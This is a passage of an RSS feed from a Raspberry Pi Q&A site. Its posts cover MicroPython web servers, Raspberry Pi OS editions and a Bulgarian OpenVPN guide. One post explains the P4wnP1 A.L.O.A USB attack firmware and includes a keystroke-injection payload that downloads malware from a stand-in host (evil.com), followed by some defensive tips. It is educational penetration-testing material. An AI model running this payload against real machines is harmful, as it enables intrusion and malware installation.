✅ Connect an **ESP8285 to WiFi** using AT commands &amp;nbsp;&lt;br /&gt;
✅ Create a **basic web server** in MicroPython &amp;nbsp;&lt;br /&gt;
✅ Serve **dynamic HTML content** &amp;nbsp;&lt;br /&gt;
✅ Troubleshoot common issues &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
This setup is perfect for **IoT dashboards, sensor monitoring, or remote device control**. For more advanced projects, consider using **WebSockets** or **MQTT** for real-time updates.&lt;br /&gt;
&lt;br /&gt;
### **Next Steps**&lt;br /&gt;
- Try adding **authentication** (`AT+CWSAP`)&lt;br /&gt;
- Experiment with **HTTPS** (requires TLS support)&lt;br /&gt;
- Integrate with **cloud services** (AWS IoT, Blynk)&lt;br /&gt;
&lt;br /&gt;
Happy coding! </description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/75/creating-wifi-connected-web-server-with-esp8285-micropython</guid>
<pubDate>Sun, 06 Apr 2025 10:05:27 +0000</pubDate>
</item>
<item>
<title>Operating system images – Raspberry Pi</title>
<link>https://asky.uk/72/operating-system-images-raspberry-pi</link>
<description>&lt;h3 class="c-software-os__heading"&gt;Raspberry Pi OS with desktop&lt;/h3&gt;&lt;div class="c-software-os__details"&gt;&lt;ul class="c-software-os__list"&gt;&lt;li class="c-software-os__item"&gt;Release date: November 19th 2024&lt;/li&gt;&lt;li class="c-software-os__item"&gt;System: 32-bit&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Kernel version: 6.6&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Debian version: 12 (bookworm)&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Size: 1,177&lt;abbr title="Megabytes"&gt;MB&lt;/abbr&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h3 class="c-software-os__heading"&gt;Raspberry Pi OS with desktop and recommended software&lt;/h3&gt;&lt;div class="c-software-os__details"&gt;&lt;ul class="c-software-os__list"&gt;&lt;li class="c-software-os__item"&gt;Release date: November 19th 2024&lt;/li&gt;&lt;li class="c-software-os__item"&gt;System: 32-bit&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Kernel version: 6.6&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Debian version: 12 (bookworm)&lt;/li&gt;&lt;li class="c-software-os__item"&gt;Size: 2,727&lt;abbr title="Megabytes"&gt;MB&lt;/abbr&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;p class="sc-rp-type-meta"&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.raspberrypi.com/software/operating-systems/"&gt;Прочети още&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi OS</category>
<guid isPermaLink="true">https://asky.uk/72/operating-system-images-raspberry-pi</guid>
<pubDate>Sun, 30 Mar 2025 21:02:56 +0000</pubDate>
</item>
<item>
<title>Raspberry Pi OS – Raspberry Pi</title>
<link>https://asky.uk/71/raspberry-pi-os-raspberry-pi</link>
<description>&lt;p&gt;&lt;strong&gt;Raspberry Pi OS – The Official Operating System for Raspberry Pi&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Raspberry Pi OS (formerly known as Raspbian) is the official operating system for Raspberry Pi devices. It is a lightweight, Debian-based Linux distribution specifically optimized for the hardware capabilities of Raspberry Pi boards. Whether used for education, home automation, robotics, or software development, Raspberry Pi OS provides a reliable and versatile platform for various projects.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;History and Development&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Raspberry Pi OS was first introduced in 2012 as Raspbian, a community-developed operating system built from the Debian Linux distribution. In 2020, the Raspberry Pi Foundation rebranded it as Raspberry Pi OS to emphasize its official support and continuous development for Raspberry Pi boards. The OS is regularly updated to ensure compatibility with new hardware and provide security improvements and performance enhancements.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Features of Raspberry Pi OS&lt;/strong&gt;&lt;/h3&gt;&lt;h4&gt;&lt;strong&gt;1. Lightweight and Optimized for Raspberry Pi&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS is designed to run efficiently on Raspberry Pi devices, even on older models with limited RAM and processing power. It is optimized for ARM architecture, ensuring smooth performance while keeping resource usage minimal.&lt;/p&gt;&lt;h4&gt;&lt;strong&gt;2. Multiple Versions Available&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS comes in different editions to suit different user needs:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS Lite&lt;/strong&gt; – A minimal, command-line-based version for advanced users and server applications.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS with Desktop&lt;/strong&gt; – Includes a lightweight desktop environment (LXDE-based) for users who prefer a graphical interface.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi OS with Desktop and Recommended Software&lt;/strong&gt; – Comes with pre-installed applications such as LibreOffice, Chromium browser, and educational tools like Scratch and Python.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;&lt;strong&gt;3. Pre-installed Applications and Tools&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;Raspberry Pi OS includes essential software out of the box, such as:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Python and Scratch&lt;/strong&gt; – Programming languages for beginners and advanced users.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Chromium Web Browser&lt;/strong&gt; – Optimized for web browsing on Raspberry Pi.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Thonny IDE&lt;/strong&gt; – A simple Python development environment for coding.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;VNC and SSH Support&lt;/strong&gt; – Enables remote access and control over the network.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;&lt;strong&gt;4. Regular Updates and Security Patches&lt;/strong&gt;&lt;/h4&gt;&lt;p&gt;The Raspberry Pi Foundation frequently updates Raspberry Pi OS to improve security, fix bugs, and enhance compatibility with the latest Raspberry Pi hardware.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Installation and Usage&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Installing Raspberry Pi OS is straightforward:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Download the official Raspberry Pi Imager from the Raspberry Pi website.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Insert a microSD card into your computer and flash the OS image using the Raspberry Pi Imager.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Insert the microSD card into the Raspberry Pi and power it on.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Raspberry Pi OS is the best choice for running a Raspberry Pi, offering stability, performance, and a user-friendly experience. Whether you are a beginner learning to code or an advanced user working on complex projects, Raspberry Pi OS provides a solid foundation for your Raspberry Pi applications.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.raspberrypi.com/software/"&gt;Прочети още&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi OS</category>
<guid isPermaLink="true">https://asky.uk/71/raspberry-pi-os-raspberry-pi</guid>
<pubDate>Sun, 30 Mar 2025 21:02:56 +0000</pubDate>
</item>
<item>
<title>Raspberry Pi Products Category on Adafruit Industries</title>
<link>https://asky.uk/70/raspberry-pi-products-category-on-adafruit-industries</link>
<description>&lt;p&gt;Raspberry Pi · 40 Pin GPIO Extension Cable for any 2x20 Pin Raspberry Pi - 150mm / 6" long · 8 Channel LoRa Gateway Kit with LoRa HAT and GPS for Pi 4 - Pi Not ...&lt;/p&gt;&lt;p&gt;&lt;a rel="nofollow" href="https://www.adafruit.com/category/105"&gt;Прочети още&lt;/a&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/70/raspberry-pi-products-category-on-adafruit-industries</guid>
<pubDate>Sun, 30 Mar 2025 20:59:55 +0000</pubDate>
</item>
<item>
<title>How to run a webserver on Raspberry Pi Pico W?</title>
<link>https://asky.uk/69/how-to-run-a-webserver-on-raspberry-pi-pico-w</link>
<description>Running a web server on the **Raspberry Pi Pico W** (which has Wi-Fi capability) is possible using **MicroPython** or **C/C++ (with the Pico SDK)**. Below, I&amp;#039;ll guide you through setting up a simple web server using **MicroPython** (the easiest method).&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Steps to Run a Web Server on Raspberry Pi Pico W**&lt;br /&gt;
&lt;br /&gt;
#### **1. Set Up MicroPython on Pico W**&lt;br /&gt;
- Download the latest **MicroPython firmware** for Pico W from: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;[https://micropython.org/download/rp2-pico-w/](https://micropython.org/download/rp2-pico-w/)&lt;br /&gt;
- Flash it onto the Pico W by holding the **BOOTSEL** button while plugging it into USB, then drag the `.uf2` file to the `RPI-RP2` drive.&lt;br /&gt;
&lt;br /&gt;
#### **2. Connect to Wi-Fi**&lt;br /&gt;
Use the following script to connect your Pico W to Wi-Fi:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
import network&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
# Configure Wi-Fi&lt;br /&gt;
ssid = &amp;quot;YOUR_WIFI_SSID&amp;quot;&lt;br /&gt;
password = &amp;quot;YOUR_WIFI_PASSWORD&amp;quot;&lt;br /&gt;
&lt;br /&gt;
wlan = network.WLAN(network.STA_IF)&lt;br /&gt;
wlan.active(True)&lt;br /&gt;
wlan.connect(ssid, password)&lt;br /&gt;
&lt;br /&gt;
# Wait for connection&lt;br /&gt;
max_wait = 10&lt;br /&gt;
while max_wait &amp;gt; 0:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if wlan.isconnected():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;max_wait -= 1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;time.sleep(1)&lt;br /&gt;
&lt;br /&gt;
if not wlan.isconnected():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;raise RuntimeError(&amp;quot;Network connection failed&amp;quot;)&lt;br /&gt;
else:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Connected to Wi-Fi&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;IP Address:&amp;quot;, wlan.ifconfig()[0])&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
#### **3. Create a Simple Web Server**&lt;br /&gt;
Here’s a basic HTTP server that responds with &amp;quot;Hello, Pico W!&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
import socket&lt;br /&gt;
&lt;br /&gt;
# HTML content to serve&lt;br /&gt;
html = &amp;quot;&amp;quot;&amp;quot;&amp;lt;!DOCTYPE html&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;title&amp;gt;Pico W Web Server&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;h1&amp;gt;Hello, Pico W!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Set up socket&lt;br /&gt;
addr = socket.getaddrinfo(&amp;#039;0.0.0.0&amp;#039;, 80)[0][-1]&lt;br /&gt;
s = socket.socket()&lt;br /&gt;
s.bind(addr)&lt;br /&gt;
s.listen(1)&lt;br /&gt;
print(&amp;quot;Listening on&amp;quot;, addr)&lt;br /&gt;
&lt;br /&gt;
# Serve requests&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;try:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn, addr = s.accept()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Client connected from&amp;quot;, addr)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;request = conn.recv(1024)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = html&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.send(&amp;quot;HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.send(response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn.close()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;except OSError as e:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Connection closed&amp;quot;)&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
#### **4. Run the Web Server**&lt;br /&gt;
- Save the script as `main.py` on your Pico W so it runs on boot.&lt;br /&gt;
- Reset the Pico W (or unplug/replug it).&lt;br /&gt;
- Open a browser and enter the **IP address** printed in the REPL.&lt;br /&gt;
&lt;br /&gt;
You should see the **&amp;quot;Hello, Pico W!&amp;quot;** page.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Enhancements (Optional)**&lt;br /&gt;
- **Handle multiple requests** (avoid crashing after one request).&lt;br /&gt;
- **Add routes** (e.g., `/`, `/led`).&lt;br /&gt;
- **Control GPIO pins** (toggle an LED via HTTP).&lt;br /&gt;
- **Use `microdot` (a lightweight MicroPython web framework)**:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```python&lt;br /&gt;
&amp;nbsp;&amp;nbsp;from microdot import Microdot&lt;br /&gt;
&amp;nbsp;&amp;nbsp;app = Microdot()&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;@app.route(&amp;#039;/&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;def index(request):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return &amp;quot;Hello from MicroDot!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;app.run(port=80)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
&amp;nbsp;&amp;nbsp;(Install `microdot` via `mip` or manually.)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Troubleshooting**&lt;br /&gt;
- **Can&amp;#039;t connect to Wi-Fi?** Check credentials and signal strength.&lt;br /&gt;
- **Port 80 not working?** Ensure no other device is using it.&lt;br /&gt;
- **Script crashes?** Wrap in `try-except` blocks.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
This is a basic example, but you can expand it to control sensors, LEDs, or serve dynamic content. Let me know if you need help with more advanced features! </description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/69/how-to-run-a-webserver-on-raspberry-pi-pico-w</guid>
<pubDate>Fri, 28 Mar 2025 23:47:45 +0000</pubDate>
</item>
<item>
<title>How to use Raspberry Pi Zero W P4wnP1 A.L.O.A?</title>
<link>https://asky.uk/68/how-to-use-raspberry-pi-zero-w-p4wnp1-a-l-o-a</link>
<description>The **Raspberry Pi Zero W** paired with **P4wnP1 A.L.O.A** (A Little Offensive Appliance) is a powerful combination for penetration testing, ethical hacking, and USB attack simulations. Below is an overview of what this setup can do and how to get started:&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **What is P4wnP1 A.L.O.A?**&lt;br /&gt;
P4wnP1 A.L.O.A is a firmware framework for the **Raspberry Pi Zero (W/WH)** that turns it into a **programmable USB attack tool**. It allows you to emulate keyboards, network interfaces, storage devices, and more, making it ideal for:&lt;br /&gt;
- **HID Attacks** (keystroke injection, BadUSB)&lt;br /&gt;
- **Network Pivoting** (Ethernet gadget, Wi-Fi impersonation)&lt;br /&gt;
- **Payload Delivery** (malicious scripts, exfiltration)&lt;br /&gt;
- **Covert Operations** (stealthy backdoors)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Key Features of P4wnP1 A.L.O.A**&lt;br /&gt;
1. **USB HID Emulation** – Acts as a keyboard/mouse to execute scripts on a target machine.&lt;br /&gt;
2. **Ethernet over USB** – Provides network access through the Pi Zero.&lt;br /&gt;
3. **Mass Storage Emulation** – Pretends to be a USB drive for payload delivery.&lt;br /&gt;
4. **Bluetooth &amp;amp; Wi-Fi Attacks** – Can perform deauthentication, sniffing, etc.&lt;br /&gt;
5. **Web Interface &amp;amp; Remote Control** – Manage attacks via a browser.&lt;br /&gt;
6. **Scriptable Payloads** – Write custom attack scripts in JavaScript or Python.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Setting Up P4wnP1 A.L.O.A on Raspberry Pi Zero W**&lt;br /&gt;
#### **1. Download the Firmware**&lt;br /&gt;
- Get the latest **P4wnP1 A.L.O.A** image from: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;[https://github.com/RoganDawes/P4wnP1_aloa](https://github.com/RoganDawes/P4wnP1_aloa)&lt;br /&gt;
&lt;br /&gt;
#### **2. Flash the Image**&lt;br /&gt;
- Use **Balena Etcher** or `dd` to flash the `.img` file to a microSD card.&lt;br /&gt;
&lt;br /&gt;
#### **3. Boot &amp;amp; Configure**&lt;br /&gt;
- Insert the microSD into the Pi Zero W and connect it via USB to a computer.&lt;br /&gt;
- By default, it should appear as a **USB Ethernet device**.&lt;br /&gt;
- Access the web interface at: &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;**`http://172.24.0.1:8000`** &amp;nbsp;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;(Default credentials: `admin:admin`)&lt;br /&gt;
&lt;br /&gt;
#### **4. Customize Payloads**&lt;br /&gt;
- Use the **web GUI** or SSH (`ssh pi@172.24.0.1`, default password: `toor`) to configure attacks.&lt;br /&gt;
- Preloaded scripts include:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **HID attacks** (e.g., reverse shell, password dumpers)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **Wi-Fi attacks** (e.g., Karma, Evil Twin)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;- **Persistence mechanisms**&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Example: BadUSB Attack (Keystroke Injection)**&lt;br /&gt;
1. **Connect** the Pi Zero W to a target PC (it will appear as a keyboard).&lt;br /&gt;
2. **Trigger** a payload (e.g., open CMD and download malware):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;```js&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(1000);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;press(&amp;quot;GUI r&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(500);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;type(&amp;quot;cmd.exe\n&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;delay(1000);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;type(&amp;quot;powershell -c \&amp;quot;iwr http://evil.com/malware.exe -O malware.exe\&amp;quot;\n&amp;quot;);&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
3. The target PC executes the commands automatically.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Defensive Considerations**&lt;br /&gt;
- **Monitor USB devices** on secure systems.&lt;br /&gt;
- **Disable AutoRun** in Windows (`gpedit.msc` → disable AutoPlay).&lt;br /&gt;
- **Use USB condoms** (data blockers) for charging ports.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
### **Conclusion**&lt;br /&gt;
The **Raspberry Pi Zero W + P4wnP1 A.L.O.A** is a compact yet powerful tool for security professionals. It can be used responsibly for penetration testing, red teaming, and learning about USB-based attacks.</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/68/how-to-use-raspberry-pi-zero-w-p4wnp1-a-l-o-a</guid>
<pubDate>Tue, 25 Mar 2025 21:13:06 +0000</pubDate>
</item>
<item>
<title>How to use Raspberry pi for VPN?</title>
<link>https://asky.uk/67/how-to-use-raspberry-pi-for-vpn</link>
<description>Ето подреденият текст с по-добра четливост и структура: &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
# **Настройка на VPN сървър с Raspberry Pi** &amp;nbsp;&lt;br /&gt;
Използването на **Raspberry Pi** като **VPN сървър** е **евтин и ефективен** начин за: &amp;nbsp;&lt;br /&gt;
✅ **Сигурен интернет трафик** &amp;nbsp;&lt;br /&gt;
✅ **Достъп до домашната мрежа отдалечено** &amp;nbsp;&lt;br /&gt;
✅ **Обикаляне на географски ограничения** &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
Тук ще намерите **стъпка по стъпка** ръководство за настройка на **OpenVPN** или **WireGuard** (два популярни VPN протокола). &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## ** Вариант 1: OpenVPN на Raspberry Pi** &amp;nbsp;&lt;br /&gt;
OpenVPN е **надежден, с отворен код** и подходящ за различни устройства. &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### ** Изисквания** &amp;nbsp;&lt;br /&gt;
- Raspberry Pi (препоръчително **Raspberry Pi 4** за по-добра скорост) &amp;nbsp;&lt;br /&gt;
- MicroSD карта (**16GB+**) &amp;nbsp;&lt;br /&gt;
- Инсталирана **Raspberry Pi OS** &amp;nbsp;&lt;br /&gt;
- Стабилна интернет връзка &amp;nbsp;&lt;br /&gt;
- Възможност за **port forwarding** в рутера (ако искате достъп отвън) &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
### ** Стъпки** &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **1. Актуализиране на системата** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **2. Инсталиране на OpenVPN &amp;amp; Easy-RSA** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo apt install openvpn easy-rsa -y&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **3. Настройка на Certificate Authority (CA)** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
make-cadir ~/openvpn-ca&lt;br /&gt;
cd ~/openvpn-ca&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Редактирайте файла `vars`: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
nano vars&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
(Задайте `KEY_COUNTRY`, `KEY_PROVINCE`, `KEY_CITY`, `KEY_ORG`, `KEY_EMAIL` и др.) &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **4. Генериране на сертификати и ключове** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
source vars&lt;br /&gt;
./clean-all&lt;br /&gt;
./build-ca &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Натиснете Enter за default стойности&lt;br /&gt;
./build-key-server server &amp;nbsp;# Име на сървъра: &amp;quot;server&amp;quot;&lt;br /&gt;
./build-key client1 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Създаване на клиентски сертификат&lt;br /&gt;
./build-dh &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Генериране на Diffie-Hellman параметри&lt;br /&gt;
openvpn --genkey --secret keys/ta.key &amp;nbsp;# За допълнителна сигурност&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **5. Конфигуриране на OpenVPN сървъра** &amp;nbsp;&lt;br /&gt;
Копирайте примерния конфигурационен файл: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo cp /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz /etc/openvpn/&lt;br /&gt;
sudo gzip -d /etc/openvpn/server.conf.gz&lt;br /&gt;
sudo nano /etc/openvpn/server.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
**Важни настройки:** &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
port 1194&lt;br /&gt;
proto udp&lt;br /&gt;
dev tun&lt;br /&gt;
ca /home/pi/openvpn-ca/keys/ca.crt&lt;br /&gt;
cert /home/pi/openvpn-ca/keys/server.crt&lt;br /&gt;
key /home/pi/openvpn-ca/keys/server.key&lt;br /&gt;
dh /home/pi/openvpn-ca/keys/dh2048.pem&lt;br /&gt;
server 10.8.0.0 255.255.255.0&lt;br /&gt;
push &amp;quot;redirect-gateway def1 bypass-dhcp&amp;quot; &amp;nbsp;# Пренасочва целия трафик през VPN&lt;br /&gt;
push &amp;quot;dhcp-option DNS 8.8.8.8&amp;quot; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# Използва Google DNS&lt;br /&gt;
keepalive 10 120&lt;br /&gt;
tls-auth /home/pi/openvpn-ca/keys/ta.key 0&lt;br /&gt;
cipher AES-256-CBC&lt;br /&gt;
user nobody&lt;br /&gt;
group nogroup&lt;br /&gt;
persist-key&lt;br /&gt;
persist-tun&lt;br /&gt;
status openvpn-status.log&lt;br /&gt;
verb 3&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **6. Активиране на IP Forwarding и защита** &amp;nbsp;&lt;br /&gt;
Редактирайте `/etc/sysctl.conf`: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo nano /etc/sysctl.conf&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Разкоментирайте: &amp;nbsp;&lt;br /&gt;
```ini&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Приложете промените: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo sysctl -p&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
Настройте NAT: &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;br /&gt;
sudo apt install iptables-persistent -y&lt;br /&gt;
sudo netfilter-persistent save&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
#### **7. Стартиране на OpenVPN** &amp;nbsp;&lt;br /&gt;
```bash&lt;br /&gt;
sudo systemctl start openvpn@server&lt;br /&gt;
sudo systemctl enable openvpn@server&lt;br /&gt;
``` &amp;nbsp;&lt;br /&gt;
